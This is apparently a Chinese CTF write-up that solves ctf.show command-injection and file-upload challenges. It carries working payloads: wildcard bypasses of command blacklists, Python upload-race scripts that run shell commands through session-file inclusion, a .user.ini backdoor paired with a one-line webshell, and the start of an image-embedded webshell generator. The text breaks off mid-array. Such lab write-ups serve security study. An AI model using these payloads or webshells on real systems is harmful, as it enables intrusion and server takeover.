class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>



<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717183954397.png" alt="image-20210717183954397"></p>
</blockquote>
<h2 id="web49"><a href="#web49" class="headerlink" title="web49"></a>web49</h2><blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717184223954.png" alt="image-20210717184223954"></p>
</blockquote>
<h2 id="web50"><a href="#web50" class="headerlink" title="web50"></a>web50</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717190209066.png" alt="image-20210717190209066"></p>
</blockquote>
<h2 id="web51"><a href="#web51" class="headerlink" title="web51"></a>web51</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717190620917.png" alt="image-20210717190620917"></p>
</blockquote>
<h2 id="web52"><a href="#web52" class="headerlink" title="web52"></a>web52</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\&gt;|\&lt;/i"</span>, $c))&#123;</span><br><span class="line">        system($c.<span class="string">" &gt;/dev/null 2&gt;&amp;1"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>



<blockquote>
<ul>
<li><p>看一下目录</p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717194039748.png" alt="image-20210717194039748"></p>
</li>
<li><p><strong>直接看看a.txt是啥</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717194149794.png" alt="image-20210717194149794"></p>
</li>
<li><p><strong>发现有个flag文件在根目录</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717194258088.png" alt="image-20210717194258088"></p>
</li>
<li><p><strong>用nl或者ta’’c看看’’是用来过滤</strong></p>
</li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717193603100.png" alt="image-20210717193603100"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717194411798.png" alt="image-20210717194411798"></p>
</blockquote>
<h2 id="web53"><a href="#web53" class="headerlink" title="web53"></a>web53</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\&gt;|\&lt;/i"</span>, $c))&#123;</span><br><span class="line">        <span class="keyword">echo</span>($c);</span><br><span class="line">        $d = system($c);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>.$d;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'no'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717195320225.png" alt="image-20210717195320225"></p>
</blockquote>
<h2 id="web54"><a href="#web54" class="headerlink" title="web54"></a>web54</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\&gt;|\&lt;/i"</span>, $c))&#123;</span><br><span class="line">        system($c);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717200118282.png" alt="image-20210717200118282"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210717200132124.png" alt="w"></p>
</blockquote>
<h2 id="web55"><a href="#web55" class="headerlink" title="web55"></a>web55</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123;</span><br><span class="line">    $c=$_GET[<span class="string">'c'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">"/\;|[a-z]|\`|\%|\x09|\x26|\&gt;|\&lt;/i"</span>, $c))&#123;</span><br><span class="line">        system($c);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>bin为binary的简写，主要放置一些系统必备的执行命令，里面有base64可以试试绕过</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;&#x2F;???&#x2F;????64 ????.???  相当于 ?c&#x3D;&#x2F;bin&#x2F;base64 flag.php</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210718092438468.png" alt="image-20210718092438468"></p>
</blockquote>
<ul>
<li>解密之后就是结果</li>
</ul>
<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210718092518736.png" alt="image-20210718092518736"></p>
</blockquote>
<ul>
<li>毕竟不是万能的，所以看了一下经典的p师傅上传命令执行，写一个upload.php简单的上传功能，然后利用. 来执行shell语句，<a href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html" target="_blank" rel="noopener">建议看看无字母数字webshell命令执行</a>了解一下原理</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="HTML"><figure class="iseeu highlight /html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">"en"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"UTF-8"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"viewport"</span> <span class="attr">content</span>=<span class="string">"width=device-width, initial-scale=1.0"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>POST数据包POC<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://9690d3da-43c1-4f75-87b3-628eff4078df.challenge.ctf.show:8080/"</span> <span class="attr">method</span>=<span class="string">"post"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--链接是当前打开的题目链接--&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">label</span> <span class="attr">for</span>=<span class="string">"file"</span>&gt;</span>文件名：<span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"file"</span> <span class="attr">id</span>=<span class="string">"file"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">name</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"提交"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>因为php的上传文件之后，服务端并没有直接丢弃上传的文件，而是放在了/tmp/????????? 这里有九位数字可以为/tmp/phpabcabD因为正常情况最后一位都会是大写字母，利用[@-[]来确定执行范围所以构造payload（@-[是大写字母的范围可以去查ascii码）好像构造的时候.后面得加个空格或者+号也行</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c&#x3D;.+&#x2F;???&#x2F;????????[@-[]</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>上传抓包</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210718100015465.png" alt="image-20210718100015465"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210718100055211.png" alt="image-20210718100055211"></p>
<blockquote>
<ul>
<li>经此可以发现写个python代码直接上传文件，就写入cat flag.php 不用加#!bin/sh</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    url = <span class="string">"http://9690d3da-43c1-4f75-87b3-628eff4078df.challenge.ctf.show:8080/?c=.+/???/????????[@-[]"</span></span><br><span class="line">    r = requests.post(url, files=&#123;<span class="string">"file"</span>: (<span class="string">'1.txt'</span>, <span class="string">'cat flag.php'</span>)&#125;)</span><br><span class="line">    <span class="keyword">if</span> r.text.find(<span class="string">"flag"</span>):</span><br><span class="line">        print(r.text)</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210718100242475.png" alt="image-20210718100242475"></p>
<h2 id="web56"><a href="#web56" class="headerlink" title="web56"></a>web56</h2><blockquote>
<ul>
<li><strong>过滤的数字，但是还是不影响第二种命令执行的方法，延续上题，或者python代码跑一波</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210718100624413.png" alt="image-20210718100624413"></p>
<h2 id="web57"><a href="#web57" class="headerlink" title="web57"></a>web57</h2><h1 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h1><h2 id="web151"><a href="#web151" class="headerlink" title="web151"></a>web151</h2><blockquote>
<ul>
<li>直接抓包改后缀名</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210721183539568.png" alt="image-20210721183539568"></p>
<h2 id="web152"><a href="#web152" class="headerlink" title="web152"></a>web152</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210721183539568.png" alt=""></p>
<h2 id="web153"><a href="#web153" class="headerlink" title="web153"></a>web153</h2><ul>
<li><strong>对php后缀基本都限制了，我们构造.user.ini用户后门</strong></li>
</ul>
<blockquote>
<ul>
<li><strong>php.ini是php的一个全局配置文件，对整个web服务起作用；而.user.ini和.htaccess一样是目录的配置文件，.user.ini就是用户自定义的一个php.ini，我们可以利用这个文件来构造后门和隐藏后门。</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file&#x3D;filename      &#x2F;&#x2F;包含在文件头</span><br><span class="line">auto_append_file&#x3D;filename       &#x2F;&#x2F;包含在文件尾</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>auto_prepend_file=1.png 就相当于当前目录中所有的php文件都调用了require(‘1.png’),只要进入任意一个php文件就可以使用1.png中我们构造的一句话木马来直接getshell和命令执行。</strong></li>
</ul>
</blockquote>
<ul>
<li><strong>首先上传.user.ini文件</strong></li>
</ul>
<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723154700946.png" alt="image-20210723154700946"></p>
</blockquote>
<ul>
<li><strong>再直接上传01.png</strong></li>
</ul>
<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723154751780.png" alt="image-20210723154751780"></p>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723155013717.png" alt="image-20210723155013717"></p>
<blockquote>
<ul>
<li>直接拿flag</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723155132721.png" alt="image-20210723155132721"></p>
<h2 id="web154"><a href="#web154" class="headerlink" title="web154"></a>web154</h2><blockquote>
<ul>
<li><strong>和上题一样传了个.user.ini文件进去，结果一句话木马写不进去，改用短标签代码&lt;?=就相当于echo接着双反引号执行命令要记得闭合</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723160015412.png" alt="image-20210723160015412"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723160118025.png" alt="image-20210723160118025"></p>
<h2 id="web155"><a href="#web155" class="headerlink" title="web155"></a>web155</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723160315690.png" alt="image-20210723160315690"></p>
<h2 id="web156"><a href="#web156" class="headerlink" title="web156"></a>web156</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<h2 id="web157"><a href="#web157" class="headerlink" title="web157"></a>web157</h2><blockquote>
<ul>
<li>和上题一样就是分号过滤了，分号改成?&gt;</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723161141006.png" alt="image-20210723161141006"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723161148481.png" alt="image-20210723161148481"></p>
<h2 id="web158"><a href="#web158" class="headerlink" title="web158"></a>web158</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<h2 id="web159"><a href="#web159" class="headerlink" title="web159"></a>web159</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<h2 id="web160"><a href="#web160" class="headerlink" title="web160"></a>web160</h2><blockquote>
<ul>
<li>过滤了反引号，那就文件包含，因为php被过滤了所以得用.来绕过</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?&#x3D;include&quot;ph&quot;.&quot;p:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;..&#x2F;flag.ph&quot;.&quot;p&quot;?&gt;</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723162541778.png" alt="image-20210723162541778"></p>
<h2 id="web161"><a href="#web161" class="headerlink" title="web161"></a>web161</h2><blockquote>
<ul>
<li>连普通的图片的上传上去，查了下</li>
<li><strong>getimagesize():</strong> 会对目标文件的16进制去进行一个读取，去读取头几个字符串是不是符合图片的要求</li>
<li>所以在上题的基础上都加个<strong>GIF89a</strong>图片头就可以了</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210723163145783.png" alt="image-20210723163145783"></p>
<h2 id="web162"><a href="#web162" class="headerlink" title="web162"></a>web162</h2><blockquote>
<ul>
<li><strong>session文件包含原理，和web82相同，还是先上传.user.ini，过gif图片头加一个GIF89A</strong></li>
<li>参考 <a href="http://www.xl-bit.cn/index.php/archives/90/" target="_blank" rel="noopener">bit</a>、<a href="https://blog.csdn.net/miuzzx/article/details/109537262" target="_blank" rel="noopener">yu22x</a>、<a href="https://www.wlhhlc.top/posts/14827/#web162" target="_blank" rel="noopener">dota_st</a></li>
</ul>
</blockquote>
<ul>
<li><strong>.user.ini</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89A</span><br><span class="line">auto_prepend_file&#x3D;&#x2F;tmp&#x2F;sess_test</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>exp162.py</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line">sessID = <span class="string">'test'</span></span><br><span class="line">url = <span class="string">'http://b309cf39-67ef-4ccd-8a93-9c7371becec8.chall.ctf.show/'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span><span class="params">(session)</span>:</span></span><br><span class="line">    <span class="keyword">while</span> event.isSet():</span><br><span class="line">        f = io.BytesIO(<span class="string">b'a'</span> * <span class="number">256</span> * <span class="number">1</span>)</span><br><span class="line">        response = session.post(</span><br><span class="line">            url,</span><br><span class="line">            cookies=&#123;<span class="string">'PHPSESSID'</span>: sessID&#125;,</span><br><span class="line">            data=&#123;<span class="string">'PHP_SESSION_UPLOAD_PROGRESS'</span>: <span class="string">'&lt;?php system("nl ../*.php");?&gt;'</span>&#125;,</span><br><span class="line">            files=&#123;<span class="string">'file'</span>: (<span class="string">'test.txt'</span>, f)&#125;</span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span><span class="params">(session)</span>:</span></span><br><span class="line">    <span class="keyword">while</span> event.isSet():</span><br><span class="line">        response = session.get(url + <span class="string">'upload/index.php'</span>.format(sessID))</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'flag'</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            print(response.text)</span><br><span class="line">            event.clear()</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            print(<span class="string">'[*]retrying...'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    event = threading.Event()</span><br><span class="line">    event.set()</span><br><span class="line">    <span class="keyword">with</span> requests.session() <span class="keyword">as</span> session:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">30</span>):</span><br><span class="line">            threading.Thread(target=write, args=(session,)).start()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">30</span>):</span><br><span class="line">            threading.Thread(target=read, args=(session,)).start()</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>运行结果</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724104738490.png" alt="image-20210724104738490"></p>
<h2 id="web163"><a href="#web163" class="headerlink" title="web163"></a>web163</h2><blockquote>
<ul>
<li>和上题一模一样</li>
</ul>
</blockquote>
<h2 id="web164"><a href="#web164" class="headerlink" title="web164"></a>web164</h2><blockquote>
<ul>
<li>题目说改头换面，猜测可能是二次渲染，大家可以参考<a href="https://www.sqlsec.com/2020/10/upload.html#toc-heading-21" target="_blank" rel="noopener">国光师傅</a></li>
<li>直接用外国大佬脚本生成一个</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*&lt;?$_GET[0]($_POST[1]);?&gt;*/</span></span><br><span class="line"></span><br><span class="line">$p = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0x0e</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>,</span><br><span class="line">    <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>,</span><br><span class="line">    <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>,</span><br><span class="line">    <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>,</span><br><span class="line">    <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>,</span><br><span class="line">    <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>,</span><br><span class="line">    <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>,</span><br><span class="line">    <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span 